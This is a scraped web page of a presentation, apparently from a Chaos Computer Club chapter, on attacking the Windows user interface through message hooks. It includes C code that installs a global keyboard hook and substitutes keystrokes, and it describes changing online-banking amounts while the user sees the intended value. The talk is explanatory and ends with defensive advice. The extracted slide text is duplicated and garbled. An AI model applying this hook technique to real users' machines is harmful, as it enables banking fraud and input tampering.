attacking the attacking the user machine machine user
play

Attacking the Attacking the User- -Machine Machine User - PowerPoint PPT Presentation

Mar 09, 2023 •285 likes •455 views

Attacking the Attacking the User- -Machine Machine User Interface Interface A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org org A Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club

  1. Attacking the Attacking the User- -Machine Machine User Interface Interface A speach speach from from Volker Birk, Volker Birk, dingens dingens@ @bumens bumens. .org org A Chaos Computer Club ERFA Kreis Ulm Chaos Computer Club ERFA Kreis Ulm http://www www. .ulm ulm. .ccc ccc.de .de, http:// , http://www www. .ccc ccc.de .de http://

  2. What's up? up? What's � Everybody Everybody searches searches for for security security for for � machine- -machine machine interfaces interfaces. . machine � Some implementations Some implementations of of cryptography cryptography � are OK OK for now for now. . are � Nobody Nobody thinks about the security thinks about the security � problems of of the the user user- -machine machine problems interfaces. . interfaces CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  3. Example: internet- -banking banking Example: internet Internet I' I'm m in! ! That That was was PC PC Webs bserv erver Mainfram Mainframe eas easy! y! at the he ban bank CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  4. The idea idea is is not not really really new new: : The CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  5. How does the Windoze Windoze GUI GUI How does the work? work? � Windoze Windoze is a timesharing system is a timesharing system � � hardware drivers in the kernel, mostly interrupt hardware drivers in the kernel, mostly interrupt � driven driven � Processes and threads in the user land Processes and threads in the user land � � Windoze Windoze is a message based GUI is a message based GUI � � System Message Queue System Message Queue - -> System Dispatcher > System Dispatcher � � - -> Thread Message Queue > Thread Message Queue - -> Thread Dispatcher > Thread Dispatcher � � - -> > WindowProc WindowProc for every Window Class. for every Window Class. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  6. How does the Windoze Windoze GUI GUI How does the System Dispatcher work? work? Thread-Message-Q System-Message-Q Translate CPU Driver Thread “Click!” IRQ12 Dispatcher WM_NC WM_NCHITTE HITTEST ST WindowProc (Message Handler) CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  7. hello, world hello, world int WinMain WinMain(HINSTANCE (HINSTANCE hInstance hInstance, , int HINSTANCE hPrevInstance hPrevInstance, , HINSTANCE LPSTR lpCmdLine lpCmdLine, , LPSTR int nCmdShow) { ) { int nCmdShow MSG msg msg; ; MSG if (!hPrevInstance if (! hPrevInstance) ) InitApp InitApp( (hInstance hInstance); ); InitInstance( InitInstance (hInstance hInstance, , nCmdShow nCmdShow); ); while (GetMessage GetMessage(& (&msg msg, NULL, 0, 0)) { , NULL, 0, 0)) { while ( TranslateMessage(& (&msg msg); ); TranslateMessage DispatchMessage(& (&msg msg); ); DispatchMessage } } return msg.wParam return msg. wParam; ; Thread Dispatcher } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  8. hello, world hello, world ATOM InitApp InitApp(HINSTANCE (HINSTANCE hInstance hInstance) { ) { ATOM WNDCLASSEX wcex WNDCLASSEX wcex; ; memset(& (&wcex wcex, 0, , 0, sizeof sizeof(WNDCLASSEX)); (WNDCLASSEX)); memset wcex. wcex .cbSize cbSize = = sizeof sizeof(WNDCLASSEX); (WNDCLASSEX); wcex.style = CS_HREDRAW | CS_VREDRAW; .style = CS_HREDRAW | CS_VREDRAW; wcex wcex. .lpfnWndProc lpfnWndProc = (WNDPROC) = (WNDPROC) WndProc WndProc; ; wcex Message Handler wcex. .hInstance hInstance = = hInstance hInstance; ; wcex wcex. wcex .hIcon hIcon = = LoadIcon LoadIcon(NULL, IDI_APPLICATION); (NULL, IDI_APPLICATION); wcex. .hCursor hCursor = = LoadCursor LoadCursor(NULL, IDC_ARROW); (NULL, IDC_ARROW); wcex wcex. .hbrBackground hbrBackground = (HBRUSH)(COLOR_WINDOW+1); = (HBRUSH)(COLOR_WINDOW+1); wcex wcex. wcex .lpszClassName lpszClassName = " = "HelloWorldClass HelloWorldClass"; "; return RegisterClassEx RegisterClassEx(& (&wcex wcex); ); return } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  9. hello, world hello, world LRESULT CALLBACK WndProc WndProc(HWND (HWND hWnd hWnd, UINT message, , UINT message, LRESULT CALLBACK WPARAM WPARAM wParam wParam, LPARAM , LPARAM lParam lParam) { ) { PAINTSTRUCT ps ps; ; PAINTSTRUCT HDC hdc hdc; ; HDC switch (message) { switch (message) { case WM_PAINT: case WM_PAINT: hdc = = BeginPaint BeginPaint( (hWnd hWnd, & , &ps ps); ); hdc RECT rt rt; ; RECT GetClientRect GetClientRect( (hWnd hWnd, & , &rt rt); ); DrawText( (hdc hdc, "hello, world", 12, & , "hello, world", 12, &rt rt, , DrawText DT_CENTER); DT_CENTER); EndPaint EndPaint( (hWnd hWnd, & , &ps ps); ); break; break; case WM_CLICK: case WM_CLICK: ... ... } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  10. The weak point: Hooks. The weak point: Hooks. � Message Hooks can be installed from any Message Hooks can be installed from any � application before any message dispatcher. application before any message dispatcher. � Messages could be filtered or altered and Messages could be filtered or altered and � transported to the Message Handlers. transported to the Message Handlers. � Is there a security system? No, Sir. Is there a security system? No, Sir. � � Attacking pattern: Man in the middle attack. Attacking pattern: Man in the middle attack. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  11. Man- -In In- -The The- -Middle Middle- -Attack. Attack. Man Message Windows Application Hook (i.e. IE for banking ;-) “Click!” CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  12. Code sample Code sample void InstallHook InstallHook() { () { void m_hLib hLib = = LoadLibrary LoadLibrary("Hook. ("Hook.dll dll"); "); m_ FARPROC pSysMsgProc pSysMsgProc = = GetProcAddress GetProcAddress(m_ (m_hLib hLib, , FARPROC "KeyboardProc KeyboardProc"); "); " PSETHOOKHANDLE pSetHookHandle pSetHookHandle = = PSETHOOKHANDLE (PSETHOOKHANDLE) GetProcAddress GetProcAddress(m_ (m_hLib hLib, , (PSETHOOKHANDLE) "SetInfo SetInfo"); "); " m_hHook hHook = = SetWindowsHookEx SetWindowsHookEx(WH_KEYBOARD, (WH_KEYBOARD, m_ (HOOKPROC) pSysMsgProc pSysMsgProc, m_ , m_hLib hLib, 0); , 0); (HOOKPROC) (*pSetHookHandle pSetHookHandle)(m_ )(m_hHook hHook); ); (* } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  13. Code sample Code sample static HHOOK hHook hHook = 0; = 0; static HHOOK void SetInfo SetInfo(HHOOK (HHOOK newHook newHook) { ) {hHook hHook = = newHook newHook;} ;} void LRESULT CALLBACK KeyboardProc LRESULT CALLBACK KeyboardProc( (int nCode int nCode, WPARAM , WPARAM wParam wParam, , LPARAM lParam lParam) { ) { LPARAM if (nCode nCode == HC_ACTION && == HC_ACTION && wParam wParam == VK_DECIMAL) { == VK_DECIMAL) { if ( // hPlayback hPlayback = = SetWindowsHookEx SetWindowsHookEx(WH_JOURNALPLAYBACK, (WH_JOURNALPLAYBACK, // // JournalPlaybackProc, , theApp theApp.m_ .m_hInstance hInstance, 0); , 0); // JournalPlaybackProc if ( if (lParam lParam & 0x80000000) & 0x80000000) keybd_event(13502, 52, KEYEVENTF_KEYUP, 0); _event(13502, 52, KEYEVENTF_KEYUP, 0); keybd else else keybd keybd_event(13502, 52, 0, 0); _event(13502, 52, 0, 0); return 1; return 1; } } return return CallNextHookEx CallNextHookEx( (hHook hHook, , nCode nCode, , wParam wParam, ,lParam lParam); ); } } CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  14. Being creative with internet Being creative with internet banking banking � User enters "42", computer understands User enters "42", computer understands � "23", user reads "42" "23", user reads "42" � User is authenticating this transaction. User is authenticating this transaction. � � Computer is transacting "23". Computer is transacting "23". � � With an Internet Explorer With an Internet Explorer plugin plugin we we � don't need any extra processes. don't need any extra processes. � Distributing such Distributing such plugins plugins made easy by made easy by � using music files with Windows XP. using music files with Windows XP. CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  15. And now? What can we do? And now? What can we do? � Better forget Windows for banking Better forget Windows for banking � purposes. purposes. � Better forget the Macintosh for banking Better forget the Macintosh for banking � purposes also. purposes also. � X11 offers a security system. But who X11 offers a security system. But who � knows that and who is using it? knows that and who is using it? � Better: cold boot from CD. Better: cold boot from CD. � CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

  16. Chaos Computer Club. Chaos Computer Club. Kabelsalat ist gesund. Kabelsalat ist gesund. Thank you you! ! Thank Volker Birk, CCC ERFA Kreis Ulm Volker Birk, CCC ERFA Kreis Ulm mailto:dingens dingens@ @bumens bumens. .org org mailto: http://www www. .ulm ulm. .ccc ccc.de .de http:// http://www www. .ccc ccc.de .de http:// CCC ERFA Kreis Ulm, Volker Birk dingens@bumens.org

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1

SAP Security: Attacking SAP users Attacking SAP users with sapsploit eXtended 1.1 Xt d d 1 1 Alexander @sh2kerr Polyakov. PCI QSA,PA-QSA 11 We change look but we keep mind Company Digital Security Research Group International

924 views • 59 slides
Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini

Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini

SESSION ID: MLAI-W03 Attacking Machine Learning: On the Security and Privacy of Neural Networks Nicholas Carlini Research Scientist, Google Brain #RSAC Act I: On the Security and Privacy of Neural Networks #RSAC Let's play a game

1.07k views • 103 slides
Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking'

Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking'

0ai Automated Reasoning (what this course is about) machine does 'thinking' user does 'thinking' AUTOMATED REASONING user does nothing machine keeps the books Krysia Broda Concerned with GENERAL DEDUCTION - applicable in many areas.

357 views • 6 slides
Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences

Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences

Evaluating Machine Learned User Experiences Asela Gunawardana Intelligent User Experiences Microsoft Research The typical machine learning problem ,

560 views • 45 slides
# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of

# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of

# Logins by User Joe to Machine Z 30 25 20 15 10 5 0 A B C D Client System Hour of User Joe's Logins to Machine Z 10 8 Frequency 6 4 2 0 0 5 10 15 20 Hour of Day 1 day of crud seen at ICSI (110K times) Adversary

446 views • 13 slides
Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a

Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a

Advanced Programming Graphical User Interface (GUI) Human-Machine Interfaces The ways in which a software system interacts with its users . Command Line Graphical User Interface - GUI Touch User Interface - TUI Multimedia (voice, animation,

690 views • 49 slides
Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking'

Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking'

0ai Automated Reasoning (what this course is about) AUTOMATED REASONING machine does 'thinking' machine does book-keeping, Krysia Broda user does nothing user does 'thinking'. Room 378 Concerned with GENERAL DEDUCTION - applicable in many

390 views • 5 slides
Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical

Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical

Last Class: Introduction to Operating Systems User apps Virtual machine interface OS physical machine interface hardware An operating system is the interface between the user and the architecture. History lesson in change. OS

355 views • 14 slides
useworld.net An open user adaptive scientific internet portal for the human machine interaction

useworld.net An open user adaptive scientific internet portal for the human machine interaction

useworld.net An open user adaptive scientific internet portal for the human machine interaction community L. Urbas, S. Leuchter, M.C. Kindsmller, R. Weyers Center of Human-Machine Systems Technische Universitt Berlin Mai 22, 2003

174 views • 13 slides
Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van

Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van

Five Shades of Noise: Analyzing Machine Translation Errors in User-Generated Text Marlies van der Wees, Arianna Bisazza, Christof Monz Statistical Machine Translation News sentence: (mumbai,

448 views • 12 slides
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of

Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have

733 views • 48 slides
What CLIR researchers assume User is User needs Machine happy (or information. searches.

What CLIR researchers assume User is User needs Machine happy (or information. searches.

iCLEF 2009 overview tags : image_search, multilinguality, interactivity, log_analysis, web2.0 J U LI O G O N ZA LO V CTO R P E I N A D O J U LI O G O N ZA LO , V CTO R P E I N A D O , P A U L CLO U G H & J U S S I K A R LG R E N

683 views • 41 slides
y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna

Security bug of the week (in iOS and OS X) y g sws1 1 Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 2 2 Attacking the stack g We have seen how the

850 views • 47 slides
Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State

Non-Attacking Chess Pieces: The Dance of Bishops Thomas Zaslavsky Binghamton University (State University of New York) Joint with Seth Chaiken and Christopher R.H. Hanusa Outline 1. Chess Problems: Non-Attacking Pieces 2. Largely Czech

608 views • 17 slides
Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology

Attacking the stack Thanks to SysSec and Secure Systems Labs at Vienna University of Technology for some of these slides Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have already seen how code

671 views • 47 slides
Merging Merb into Rails Wednesday, November 18, 2009 Me Wednesday, November 18, 2009 Yehuda

Merging Merb into Rails Wednesday, November 18, 2009 Me Wednesday, November 18, 2009 Yehuda

Merging Merb into Rails Wednesday, November 18, 2009 Me Wednesday, November 18, 2009 Yehuda Katz Wednesday, November 18, 2009 Wednesday, November 18, 2009 Wednesday, November 18, 2009 Wednesday, November 18, 2009 @carlhuda Wednesday,

1.94k views • 138 slides
GRAPHICAL VIEWS @sponemann FOR WEB-BASED MODELING TOOLS WITH THEIA AND SPROTTY ECLIPSE THEIA

GRAPHICAL VIEWS @sponemann FOR WEB-BASED MODELING TOOLS WITH THEIA AND SPROTTY ECLIPSE THEIA

JAN KHNLEIN, MIRO SPNEMANN @jankoehnlein GRAPHICAL VIEWS @sponemann FOR WEB-BASED MODELING TOOLS WITH THEIA AND SPROTTY ECLIPSE THEIA CREATE WEB-BASED TOOLS IDE framework Using LSP Next-gen Eclipse RCP Extend with custom

750 views • 41 slides
Introduction to Dradis plugin programming 22 February 2008 by Siebert Lubbe Overview General

Introduction to Dradis plugin programming 22 February 2008 by Siebert Lubbe Overview General

Introduction to Dradis plugin programming 22 February 2008 by Siebert Lubbe Overview General client side structure Dispatcher Plugin framework Small example Nmap plugin General client side structure Have a look at you Dradis

214 views • 7 slides
CPSC 410/ 611: Week 3: CPU Scheduling Schedulers in t he OS St ruct ure of a CPU

CPSC 410/ 611: Week 3: CPU Scheduling Schedulers in t he OS St ruct ure of a CPU

CPSC 410 / 611 : Operating Systems CPSC 410/ 611: Week 3: CPU Scheduling Schedulers in t he OS St ruct ure of a CPU Scheduler Scheduling = Select ion + Dispat ching Thread Dispat ching (hands-on!) Crit eria f or scheduling

198 views • 16 slides
Chapter 2 Process, Thread and Process, Thread and Chapter 2 Scheduling Scheduling

Chapter 2 Process, Thread and Process, Thread and Chapter 2 Scheduling Scheduling

Chapter 2 Process, Thread and Process, Thread and Chapter 2 Scheduling Scheduling Scheduler Class and Priority XIANG Yong xyong@tsinghua.edu.cn Outline Scheduling Class and Priority Scheduling Class and Priority Dispatch

663 views • 34 slides
Accurate Appearance Preserving Prefiltering for Rendering Displacement-Mapped Surfaces Lifan Wu 1

Accurate Appearance Preserving Prefiltering for Rendering Displacement-Mapped Surfaces Lifan Wu 1

Accurate Appearance Preserving Prefiltering for Rendering Displacement-Mapped Surfaces Lifan Wu 1 Shuang Zhao 2 Ling-Qi Yan 3 Ravi Ramamoorthi 1 1 University of California, San Diego 2 University of California, Irvine 3 University of California,

910 views • 50 slides
Clutter Reduction Methods for Point Symbols in Map Mashups Jari Korpi, Paula Ahonen-Rainio

Clutter Reduction Methods for Point Symbols in Map Mashups Jari Korpi, Paula Ahonen-Rainio

Clutter Reduction Methods for Point Symbols in Map Mashups Jari Korpi, Paula Ahonen-Rainio 28.8.2013 Contents 1. Aim of the study: Clutter reduction for map mashups 2. Classification of the clutter reduction methods 3. Criteria for

292 views • 13 slides
E E S S P P . Escola Polit` ecnica Superior . Universitat de Lleida The center cyclicity

E E S S P P . Escola Polit` ecnica Superior . Universitat de Lleida The center cyclicity

. . E E S S P P . Escola Polit` ecnica Superior . Universitat de Lleida The center cyclicity of the Lorenz, Chen and L u systems Isaac A. Garc a AQTDE2019 (Castro Urdiales, June 17-21, 2019) Isaac A. Garc a The center

663 views • 27 slides

More recommend